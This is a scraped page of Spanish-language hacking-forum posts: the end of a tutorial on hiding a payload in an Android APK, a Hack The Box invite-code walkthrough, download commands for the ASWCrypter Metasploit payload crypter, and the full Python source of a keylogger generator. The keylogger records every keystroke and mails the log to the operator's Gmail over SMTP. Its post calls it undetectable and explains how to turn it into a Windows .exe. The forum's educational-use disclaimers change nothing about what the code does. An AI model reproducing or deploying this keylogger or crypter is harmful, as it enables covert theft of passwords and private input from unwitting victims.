Nota: puede que nos pida que habilitemos las opciones de orígenes desconocidos.



Autor: niqqo_18
Fuente: taringa.net/posts/ebooks-tutoriales/19715978/HACKEAR-ANDROID-Esconder-un-payload-en-cualquier-APK.html

18
Soluciones de Wargames / Resolviendo el Code Invite de Hack The Box
« en: Octubre 03, 2018, 03:36:04 pm »
Hola a todos! Hace poco me pidieron que creara un team en HTB y para ello necesitaba tener una cuenta. Al entrar al sitio vi que para registrarse había que ingresar un "invite code" y me dijo @rollth que es un CTF, es decir, para registrarse, hay que obtener el flag y con eso registrarse.


Resolverlo es facil, simplemente hay que inspeccionar el código fuente de la página


Hay un JS bastante llamativo, el cual se llama "inviteapi.min.js" y al mirarlo en detalle me topé con esto:


Mucho no se entiende, pero casi al final tira palabras claves tales como "Console", "verifyInviteCode", "makeInviteCode", entre otras.. Asique lo que se me ocurrió, fue ejecutar en la consola del navegador "makeInviteCode()" para generar el código que necesito.

Esto me devolvió un 200 con una especie de JSON que tenía este contenido:


Código: Text
  1. data: "SW4gb3JkZXIgdG8gZ2VuZXJhdGUgdGhlIGludml0ZSBjb2RlLCBtYWtlIGEgUE9TVCByZXF1ZXN0IHRvIC9hcGkvaW52aXRlL2dlbmVyYXRl"
  2. enctype: "BASE64"

Esto me tiró una cadena encodeada con BASE64. Pueden usar la web https://servicios.underc0de.org/sneak.php para saber que quiere decir


Ahora me dice que debo hacer un POST a "/api/invite/generate"

Con Linux tirando un: "curl -XPOST https://hackthebox.eu/api/invite/generate" es suficiente, pero en mi caso que estoy en Windows, utilizo CMDER que es una consola que acepta comandos de Linux

El resultado será este:


Nuevamente es un BASE64, lo volvemos convertir y tendremos nuestro código de invitación



Y al clickear en Sign Up, nos llevará a la página de registro.


NOTA: Algo que noté, es que los cifrados pueden cambiar, la primera vez me salió un ROT13 y para este tutorial me salió BASE64. De igual forma no hace diferencia, se resuelve de la misma forma, solo hay que cambiar el tipo de cifrado.

Saludos y espero que les sirva,
ANTRAX

19

Nota legal:

El autor no es responsable por el mal uso de esta herramienta, recuerde que esto es solo para fines educativos.
Requerimientos

1- Metasploit Framework
2- Python

Descargando el script

Código: Bash
  1. git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git
  2. cd ASWCrypter
  3. chmod +x setup.sh or chmod 777 setup.sh


Repo: https://github.com/AbedAlqaderSwedan1/ASWCrypter

Fuente: divdesign.mx

Saludos,
ANTRAX

20

Este es un script el cual nos permite generar un keylogger indetectable el cual nos envía las teclas capturadas a nuestro correo de gmail. Una vez generamos nuestro keylogger en nuestra kali linux tendriamos que pasar el archivo .py a una maquina windows para convertirlo en un .exe. La herramienta un esta en desarrollo.

instala el modulo en windows o linux:

Código: Bash
  1. [email protected]:$ pip install keyboard

Para convertir a exe, pueden usar Pyinstaller


Código Fuente:

Código: Python
  1. #!/bin/usr/python
  2. # -*- coding: utf-8 -*-
  3. import io
  4. import os
  5. def generate(usuario,password,email1):
  6.         with io.FileIO("keylogger.py", "w") as file:
  7.                 file.write('''
  8. #!/bin/usr/python
  9. # -*- coding: utf-8 -*-
  10. import threading
  11. import os
  12. import keyboard
  13. import smtplib
  14. from time import sleep
  15.  
  16. def keylogger():
  17.    FILE_NAME = "keys.txt"
  18.    CLEAR_ON_STARTUP = False
  19.    TERMINATE_KEY = "enter"
  20.    if CLEAR_ON_STARTUP:
  21.        os.remove(FILE_NAME)
  22.    
  23.    output = open(FILE_NAME, "a")
  24.    
  25.    for string in keyboard.get_typed_strings(keyboard.record(TERMINATE_KEY)):
  26.        output.write(string)
  27.    
  28.    output.close()
  29. def sendmail():
  30.    
  31.  
  32.    gmail_user = "'''+usuario+'''"
  33.    gmail_password = "'''+password+'''"
  34.    FROM =gmail_user
  35.    TO = "'''+email1+'''"
  36.    SUBJECT= "key"
  37.        
  38.    sleep(7.0)
  39.    try:
  40.        F = open("keys.txt","r")
  41.        TEXT= F.read()
  42.        message = """\From: %s\nTo: %s\nSubject: %s\n\n%s
  43.        """ % (FROM, ", ".join(TO), SUBJECT, TEXT)
  44.    except:
  45.        print "error"
  46.    try:
  47.        server =smtplib.SMTP("smtp.gmail.com", 587)
  48.        server.ehlo()
  49.        server.starttls()
  50.        server.login(gmail_user,gmail_password)
  51.        server.sendmail(FROM, TO, message)
  52.        server.close()
  53.        print "eviado"
  54.    except:
  55.        print "error"
  56. os.system("nano keys.txt")
  57. while True:
  58.  
  59.    if __name__ == "__main__":
  60.        
  61.        key = threading.Thread(target=keylogger)
  62.        mail = threading.Thread(target=sendmail)
  63.  
  64.        key.start()
  65.        mail.start()
  66.  
  67.        key.join()
  68.        mail.join()
  69.  
  70. ''')
  71.  
  72. def info():
  73.  
  74.         print bcolors.BOLD+bcolors.RED+"\nThanks for trying my tool, do not forget to search me on my social networks"+bcolors.ENDC+bcolors.ENDC
  75.         print "\033[1;36m● Twitter: @Sh4Rk_0\033[1;m"
  76.         print bcolors.BLUE+"● Facebook: Hacking Pills"+bcolors.ENDC
  77.         print bcolors.GREEN+"● Blog: hackingpills.blogspot.com"+bcolors.ENDC
  78.         print bcolors.BOLD+bcolors.RED+"● YouTube: HackingPills\n"+bcolors.ENDC+bcolors.ENDC
  79.  
  80.  
  81.  
  82. class bcolors:
  83.     BLUE = '\033[94m'
  84.     GREEN = '\033[92m'
  85.     RED = '\033[31m'
  86.     YELLOW = '\033[93m'
  87.     ENDC = '\033[0m'
  88.     BOLD = '\033[1m'
  89.     BGRED = '\033[41m'
  90.  
  91.  
  92. print '''
  93. \033[1;91m
  94. ┌═════════════════════════════════════════════════════════════════════════════┐
  95. █               Author: @Sh4Rk_0                                              █
  96. █                                                                             █
  97. █                       Site: https://hackingpills.blogspot.com               █
  98. █                                                                             █
  99. █                             Copyright (C) 2018 Spykeyboard @Sh4rk_0         █
  100. └═════════════════════════════════════════════════════════════════════════════┘     \n \033[1;m      
  101. '''
  102.  
  103. print bcolors.BOLD+bcolors.RED+"\n●This tool was created for ethical reasons, I am not responsible for misuse.●"+bcolors.ENDC+bcolors.ENDC
  104.  
  105.  
  106. usuario = raw_input(bcolors.GREEN+"Enter your email: "+bcolors.ENDC)
  107.  
  108. password = raw_input(bcolors.GREEN+"Enter your password: "+bcolors.ENDC)
  109.  
  110. email1 = raw_input(bcolors.GREEN+"Enter your email receive: "+bcolors.ENDC)
  111.  
  112. print bcolors.YELLOW+"\nYour keylogger is ready, compile it to .exe in a Windows machine."+bcolors.ENDC
  113.  
  114. generate(usuario,password,email1)
  115. info()
  116.  

Repositorio: https://github.com/Sh4rk0-666/Spykeyboard

Páginas: [1] 2 3 ... 61